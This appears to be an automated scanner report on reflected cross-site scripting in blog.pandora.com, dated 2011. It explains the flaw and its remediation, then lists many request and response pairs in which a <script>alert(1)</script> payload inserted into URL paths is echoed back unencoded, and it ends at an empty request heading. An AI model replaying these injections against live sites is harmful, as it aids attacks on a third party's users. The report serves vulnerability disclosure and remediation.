Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 327
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 332
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
